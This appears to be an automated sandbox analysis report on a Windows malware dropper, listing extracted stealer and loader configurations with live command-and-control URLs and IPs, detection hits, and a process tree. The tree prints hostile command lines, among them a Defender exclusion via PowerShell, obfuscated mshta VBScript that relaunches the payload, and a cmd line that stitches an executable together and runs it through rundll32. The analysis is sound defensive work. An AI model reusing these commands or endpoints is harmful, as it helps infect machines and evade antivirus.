Analysis
max time kernel: 29s
max time network: 161s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
submitted: 03-04-2024 22:51
Static task: static1
Behavioral task: behavioral1
  Sample: a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
  Resource: win10v2004-20240226-en
General
Target: a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
Size: 4.2MB
MD5: a8d5b4fa270a49cc070fcf42ab106ea6
SHA1: 8ad8be3abdcc2c9fe315a8a72a5f26a3454b9abe
SHA256: 5d7d978a1e749fa8208f5e159d94d283845a1850799afe80aeec4163eb063af1
SHA512: 8feae0f3ae36d79683248e86c97fa03c383f5d715f9f7fecf55e5576b9c6fdddb5b6ebbfe836e48ed4e1eb641b679466e3418712998f4d1835d7deb10f839fd9
SSDEEP: 98304:JgFGhIlJg12cL46XQjaIT8y+iAE+OqUgQ47jmhb:J0fJg1BcjXXxB+OqLb7+b
Malware Config
Extracted: socelars
  http://www.iyiqian.com/
  http://www.hbgents.top/
  http://www.rsnzhy.com/
  http://www.znsjis.top/
Extracted: smokeloader
  pub5
Extracted: gcleaner
  ggg-cl.biz
  45.9.20.13
Extracted: vidar
  41.2
  916
  https://mas.to/@serg4325
  profile_id: 916
Extracted: nullmixer
  http://hsiens.xyz/
Extracted: smokeloader
  2020
  http://gmpeople.com/upload/
  http://mile48.com/upload/
  http://lecanardstsornin.com/upload/
  http://m3600.com/upload/
  http://camasirx.com/upload/
Extracted: redline
  media214
  91.121.67.60:2151
  auth_value: e37d5065561884bb54c8ed1baa6de446
Signatures

Detect Fabookie payload (1 IoC)
resource | yara_rule
behavioral2/files/0x0007000000023267-87.dat | family_fabookie

OnlyLogger
A tiny loader that uses IPLogger to get its payload.

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (1 IoC)
resource | yara_rule
behavioral2/memory/5052-244-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline

SectopRAT payload (1 IoC)
resource | yara_rule
behavioral2/memory/5052-244-0x0000000000400000-0x0000000000422000-memory.dmp | family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars payload (1 IoC)
resource | yara_rule
behavioral2/files/0x000700000002326e-79.dat | family_socelars

OnlyLogger payload (3 IoCs)
resource | yara_rule
behavioral2/memory/4032-111-0x0000000000400000-0x0000000000883000-memory.dmp | family_onlylogger
behavioral2/memory/4032-115-0x00000000024D0000-0x0000000002518000-memory.dmp | family_onlylogger
behavioral2/memory/4032-233-0x0000000000400000-0x0000000000883000-memory.dmp | family_onlylogger

Vidar Stealer (3 IoCs)
resource | yara_rule
behavioral2/memory/4592-113-0x0000000002540000-0x0000000002616000-memory.dmp | family_vidar
behavioral2/memory/4592-114-0x0000000000400000-0x00000000008D6000-memory.dmp | family_vidar
behavioral2/memory/4592-159-0x0000000000400000-0x00000000008D6000-memory.dmp | family_vidar

Blocklisted process makes network request (5 IoCs)
flow | pid | Process
18 | 972 | Thu10c488b371805e.exe
24 | 972 | Thu10c488b371805e.exe
27 | 972 | Thu10c488b371805e.exe
42 | 972 | Thu10c488b371805e.exe
45 | 972 | Thu10c488b371805e.exe

resource | yara_rule
behavioral2/files/0x0004000000022d20-57.dat | aspack_v212_v242
behavioral2/files/0x0003000000022d25-55.dat | aspack_v212_v242
behavioral2/files/0x0010000000023259-59.dat | aspack_v212_v242

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | setup_installer.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | Thu10e4c72be5623a40.exe

Executes dropped EXE (12 IoCs)
pid | Process
3620 | setup_installer.exe
3216 | setup_install.exe
3860 | Thu1009c5af81.exe
3528 | Thu1059c186da67d4.exe
4556 | Thu108c22e0002.exe
4360 | Thu10ab306459a77.exe
4032 | Thu105ed9e6198dd191.exe
2392 | Thu10fbc9c6f3.exe
4592 | Thu1071035b3cb.exe
4156 | Thu105dc00580c8df.exe
972 | Thu10c488b371805e.exe
872 | Thu10e4c72be5623a40.exe

Loads dropped DLL (7 IoCs)
pid | Process
3216 | setup_install.exe
3216 | setup_install.exe
3216 | setup_install.exe
3216 | setup_install.exe
3216 | setup_install.exe
3216 | setup_install.exe
3216 | setup_install.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 6 IoCs)
flow | ioc
32 | iplogger.org
33 | iplogger.org
40 | iplogger.org
42 | iplogger.org
99 | pastebin.com
100 | pastebin.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
19 | ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (11 IoCs)
pid | pid_target | Process | procid_target
4176 | 3216 | WerFault.exe | 97
4860 | 4592 | WerFault.exe | 118
4000 | 4032 | WerFault.exe | 112
2928 | 4032 | WerFault.exe | 112
3076 | 4032 | WerFault.exe | 112
2344 | 4032 | WerFault.exe | 112
3372 | 4032 | WerFault.exe | 112
3556 | 4032 | WerFault.exe | 112
4044 | 4032 | WerFault.exe | 112
4540 | 4032 | WerFault.exe | 112
2372 | 4032 | WerFault.exe | 112

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu1059c186da67d4.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu1059c186da67d4.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu1059c186da67d4.exe

Kills process with taskkill (2 IoCs)
pid | Process
2460 | taskkill.exe
3068 | taskkill.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid | Process
3528 | Thu1059c186da67d4.exe
3528 | Thu1059c186da67d4.exe
2124 | powershell.exe
2124 | powershell.exe
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found
3376 | Process not Found

Suspicious behavior: MapViewOfSection (1 IoC)
pid | Process
3528 | Thu1059c186da67d4.exe

Suspicious use of AdjustPrivilegeToken (41 IoCs)
description | pid | Process
Token: SeCreateTokenPrivilege | 972 | Thu10c488b371805e.exe
Token: SeAssignPrimaryTokenPrivilege | 972 | Thu10c488b371805e.exe
Token: SeLockMemoryPrivilege | 972 | Thu10c488b371805e.exe
Token: SeIncreaseQuotaPrivilege | 972 | Thu10c488b371805e.exe
Token: SeMachineAccountPrivilege | 972 | Thu10c488b371805e.exe
Token: SeTcbPrivilege | 972 | Thu10c488b371805e.exe
Token: SeSecurityPrivilege | 972 | Thu10c488b371805e.exe
Token: SeTakeOwnershipPrivilege | 972 | Thu10c488b371805e.exe
Token: SeLoadDriverPrivilege | 972 | Thu10c488b371805e.exe
Token: SeSystemProfilePrivilege | 972 | Thu10c488b371805e.exe
Token: SeSystemtimePrivilege | 972 | Thu10c488b371805e.exe
Token: SeProfSingleProcessPrivilege | 972 | Thu10c488b371805e.exe
Token: SeIncBasePriorityPrivilege | 972 | Thu10c488b371805e.exe
Token: SeCreatePagefilePrivilege | 972 | Thu10c488b371805e.exe
Token: SeCreatePermanentPrivilege | 972 | Thu10c488b371805e.exe
Token: SeBackupPrivilege | 972 | Thu10c488b371805e.exe
Token: SeRestorePrivilege | 972 | Thu10c488b371805e.exe
Token: SeShutdownPrivilege | 972 | Thu10c488b371805e.exe
Token: SeDebugPrivilege | 972 | Thu10c488b371805e.exe
Token: SeAuditPrivilege | 972 | Thu10c488b371805e.exe
Token: SeSystemEnvironmentPrivilege | 972 | Thu10c488b371805e.exe
Token: SeChangeNotifyPrivilege | 972 | Thu10c488b371805e.exe
Token: SeRemoteShutdownPrivilege | 972 | Thu10c488b371805e.exe
Token: SeUndockPrivilege | 972 | Thu10c488b371805e.exe
Token: SeSyncAgentPrivilege | 972 | Thu10c488b371805e.exe
Token: SeEnableDelegationPrivilege | 972 | Thu10c488b371805e.exe
Token: SeManageVolumePrivilege | 972 | Thu10c488b371805e.exe
Token: SeImpersonatePrivilege | 972 | Thu10c488b371805e.exe
Token: SeCreateGlobalPrivilege | 972 | Thu10c488b371805e.exe
Token: 31 | 972 | Thu10c488b371805e.exe
Token: 32 | 972 | Thu10c488b371805e.exe
Token: 33 | 972 | Thu10c488b371805e.exe
Token: 34 | 972 | Thu10c488b371805e.exe
Token: 35 | 972 | Thu10c488b371805e.exe
Token: SeDebugPrivilege | 4556 | Thu108c22e0002.exe
Token: SeDebugPrivilege | 2124 | powershell.exe
Token: SeDebugPrivilege | 2460 | taskkill.exe
Token: SeShutdownPrivilege | 3376 | Process not Found
Token: SeCreatePagefilePrivilege | 3376 | Process not Found
Token: SeShutdownPrivilege | 3376 | Process not Found
Token: SeCreatePagefilePrivilege | 3376 | Process not Found

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 4628 wrote to memory of 3620 | 4628 | a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe | 96
PID 4628 wrote to memory of 3620 | 4628 | a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe | 96
PID 4628 wrote to memory of 3620 | 4628 | a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe | 96
PID 3620 wrote to memory of 3216 | 3620 | setup_installer.exe | 97
PID 3620 wrote to memory of 3216 | 3620 | setup_installer.exe | 97
PID 3620 wrote to memory of 3216 | 3620 | setup_installer.exe | 97
PID 3216 wrote to memory of 1632 | 3216 | setup_install.exe | 100
PID 3216 wrote to memory of 1632 | 3216 | setup_install.exe | 100
PID 3216 wrote to memory of 1632 | 3216 | setup_install.exe | 100
PID 3216 wrote to memory of 3004 | 3216 | setup_install.exe | 101
PID 3216 wrote to memory of 3004 | 3216 | setup_install.exe | 101
PID 3216 wrote to memory of 3004 | 3216 | setup_install.exe | 101
PID 3216 wrote to memory of 2452 | 3216 | setup_install.exe | 102
PID 3216 wrote to memory of 2452 | 3216 | setup_install.exe | 102
PID 3216 wrote to memory of 2452 | 3216 | setup_install.exe | 102
PID 3216 wrote to memory of 2192 | 3216 | setup_install.exe | 103
PID 3216 wrote to memory of 2192 | 3216 | setup_install.exe | 103
PID 3216 wrote to memory of 2192 | 3216 | setup_install.exe | 103
PID 3216 wrote to memory of 4512 | 3216 | setup_install.exe | 104
PID 3216 wrote to memory of 4512 | 3216 | setup_install.exe | 104
PID 3216 wrote to memory of 4512 | 3216 | setup_install.exe | 104
PID 3216 wrote to memory of 4056 | 3216 | setup_install.exe | 105
PID 3216 wrote to memory of 4056 | 3216 | setup_install.exe | 105
PID 3216 wrote to memory of 4056 | 3216 | setup_install.exe | 105
PID 3216 wrote to memory of 1700 | 3216 | setup_install.exe | 106
PID 3216 wrote to memory of 1700 | 3216 | setup_install.exe | 106
PID 3216 wrote to memory of 1700 | 3216 | setup_install.exe | 106
PID 3216 wrote to memory of 4644 | 3216 | setup_install.exe | 107
PID 3216 wrote to memory of 4644 | 3216 | setup_install.exe | 107
PID 3216 wrote to memory of 4644 | 3216 | setup_install.exe | 107
PID 3216 wrote to memory of 4228 | 3216 | setup_install.exe | 108
PID 3216 wrote to memory of 4228 | 3216 | setup_install.exe | 108
PID 3216 wrote to memory of 4228 | 3216 | setup_install.exe | 108
PID 3216 wrote to memory of 2304 | 3216 | setup_install.exe | 109
PID 3216 wrote to memory of 2304 | 3216 | setup_install.exe | 109
PID 3216 wrote to memory of 2304 | 3216 | setup_install.exe | 109
PID 3216 wrote to memory of 1932 | 3216 | setup_install.exe | 177
PID 3216 wrote to memory of 1932 | 3216 | setup_install.exe | 177
PID 3216 wrote to memory of 1932 | 3216 | setup_install.exe | 177
PID 3004 wrote to memory of 3860 | 3004 | cmd.exe | 111
PID 3004 wrote to memory of 3860 | 3004 | cmd.exe | 111
PID 2452 wrote to memory of 4032 | 2452 | cmd.exe | 112
PID 2452 wrote to memory of 4032 | 2452 | cmd.exe | 112
PID 2452 wrote to memory of 4032 | 2452 | cmd.exe | 112
PID 1932 wrote to memory of 3528 | 1932 | cmd.exe | 113
PID 1932 wrote to memory of 3528 | 1932 | cmd.exe | 113
PID 1932 wrote to memory of 3528 | 1932 | cmd.exe | 113
PID 4512 wrote to memory of 4556 | 4512 | cmd.exe | 114
PID 4512 wrote to memory of 4556 | 4512 | cmd.exe | 114
PID 4644 wrote to memory of 4360 | 4644 | cmd.exe | 115
PID 4644 wrote to memory of 4360 | 4644 | cmd.exe | 115
PID 4644 wrote to memory of 4360 | 4644 | cmd.exe | 115
PID 4056 wrote to memory of 2392 | 4056 | cmd.exe | 116
PID 4056 wrote to memory of 2392 | 4056 | cmd.exe | 116
PID 4056 wrote to memory of 2392 | 4056 | cmd.exe | 116
PID 2304 wrote to memory of 4592 | 2304 | cmd.exe | 118
PID 2304 wrote to memory of 4592 | 2304 | cmd.exe | 118
PID 2304 wrote to memory of 4592 | 2304 | cmd.exe | 118
PID 1700 wrote to memory of 4156 | 1700 | cmd.exe | 119
PID 1700 wrote to memory of 4156 | 1700 | cmd.exe | 119
PID 1700 wrote to memory of 4156 | 1700 | cmd.exe | 119
PID 2192 wrote to memory of 972 | 2192 | cmd.exe | 164
PID 2192 wrote to memory of 972 | 2192 | cmd.exe | 164
PID 2192 wrote to memory of 972 | 2192 | cmd.exe | 164

Processes

C:\Users\Admin\AppData\Local\Temp\a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\a8d5b4fa270a49cc070fcf42ab106ea6_JaffaCakes118.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4628
  C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 3620
    C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\setup_install.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\setup_install.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 3216
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        PID: 1632
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2124
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu1009c5af81.exe
        - Suspicious use of WriteProcessMemory
        PID: 3004
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu1009c5af81.exe
          Command line: Thu1009c5af81.exe
          - Executes dropped EXE
          PID: 3860
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu105ed9e6198dd191.exe /mixone
        - Suspicious use of WriteProcessMemory
        PID: 2452
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu105ed9e6198dd191.exe
          Command line: Thu105ed9e6198dd191.exe /mixone
          - Executes dropped EXE
          PID: 4032
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 620
            - Program crash
            PID: 4000
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 656
            - Program crash
            PID: 2928
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 756
            - Program crash
            PID: 3076
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 800
            - Program crash
            PID: 2344
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 664
            - Program crash
            PID: 3372
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 824
            - Program crash
            PID: 3556
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1068
            - Program crash
            PID: 4044
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1120
            - Program crash
            PID: 4540
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1296
            - Program crash
            PID: 2372
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu10c488b371805e.exe
        - Suspicious use of WriteProcessMemory
        PID: 2192
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10c488b371805e.exe
          Command line: Thu10c488b371805e.exe
          - Blocklisted process makes network request
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID: 972
          C:\Windows\SysWOW64\cmd.exe
            Command line: cmd.exe /c taskkill /f /im chrome.exe
            PID: 2740
            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /f /im chrome.exe
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
              PID: 2460
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu108c22e0002.exe
        - Suspicious use of WriteProcessMemory
        PID: 4512
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu108c22e0002.exe
          Command line: Thu108c22e0002.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID: 4556
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu10fbc9c6f3.exe
        - Suspicious use of WriteProcessMemory
        PID: 4056
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10fbc9c6f3.exe
          Command line: Thu10fbc9c6f3.exe
          - Executes dropped EXE
          PID: 2392
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu105dc00580c8df.exe
        - Suspicious use of WriteProcessMemory
        PID: 1700
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu105dc00580c8df.exe
          Command line: Thu105dc00580c8df.exe
          - Executes dropped EXE
          PID: 4156
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu10ab306459a77.exe
        - Suspicious use of WriteProcessMemory
        PID: 4644
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
          Command line: Thu10ab306459a77.exe
          - Executes dropped EXE
          PID: 4360
          C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            Command line: C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            PID: 3856
          C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            Command line: C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            PID: 2104
          C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            Command line: C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            PID: 1848
          C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            Command line: C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            PID: 4000
          C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            Command line: C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10ab306459a77.exe
            PID: 5052
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu10e4c72be5623a40.exe
        PID: 4228
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe
          Command line: Thu10e4c72be5623a40.exe
          - Checks computer location settings
          - Executes dropped EXE
          PID: 872
          C:\Windows\SysWOW64\mshta.exe
            Command line: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
            PID: 2436
            C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu10e4c72be5623a40.exe") do taskkill /F -Im "%~NxU"
              PID: 2148
              C:\Users\Admin\AppData\Local\Temp\09xU.exE
                Command line: 09xU.EXE -pPtzyIkqLZoCarb5ew
                PID: 4772
                C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  PID: 4112
                  C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
                    PID: 5104
                C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
                  PID: 1612
                  C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                    PID: 3900
                    C:\Windows\System32\Conhost.exe
                      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      PID: 3856
                    C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                      PID: 544
                    C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                      PID: 2612
                    C:\Windows\SysWOW64\control.exe
                      Command line: control .\R6f7sE.I
                      PID: 4576
                      C:\Windows\SysWOW64\rundll32.exe
                        Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                        PID: 4052
                        C:\Windows\system32\RunDll32.exe
                          Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                          PID: 1168
                          C:\Windows\SysWOW64\rundll32.exe
                            Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                            PID: 972
              C:\Windows\SysWOW64\taskkill.exe
                Command line: taskkill /F -Im "Thu10e4c72be5623a40.exe"
                - Kills process with taskkill
                PID: 3068
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu1071035b3cb.exe
        - Suspicious use of WriteProcessMemory
        PID: 2304
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu1071035b3cb.exe
          Command line: Thu1071035b3cb.exe
          - Executes dropped EXE
          PID: 4592
          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1028
            - Program crash
            PID: 4860
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Thu1059c186da67d4.exe
        - Suspicious use of WriteProcessMemory
        PID: 1932
        C:\Users\Admin\AppData\Local\Temp\7zS42E370C7\Thu1059c186da67d4.exe
          Command line: Thu1059c186da67d4.exe
          - Executes dropped EXE
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          PID: 3528
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 584
        - Program crash
        PID: 4176

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3216 -ip 3216
  PID: 2920

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4592 -ip 4592
  PID: 5004

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4032 -ip 4032
  PID: 2260

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4032 -ip 4032
  PID: 3292

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4032 -ip 4032
  PID: 4544

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4032 -ip 4032
  PID: 1952

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4032 -ip 4032
  PID: 4000

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032
  PID: 5004

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4032 -ip 4032
  PID: 3900

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4032 -ip 4032
  PID: 3644

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4032 -ip 4032
  PID: 2972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1344 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
  PID: 3308

C:\Windows\servicing\TrustedInstaller.exe
  Command line: C:\Windows\servicing\TrustedInstaller.exe
  PID: 1932

Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize 700B
MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Filesize 474KB
MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

Filesize 126KB
MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
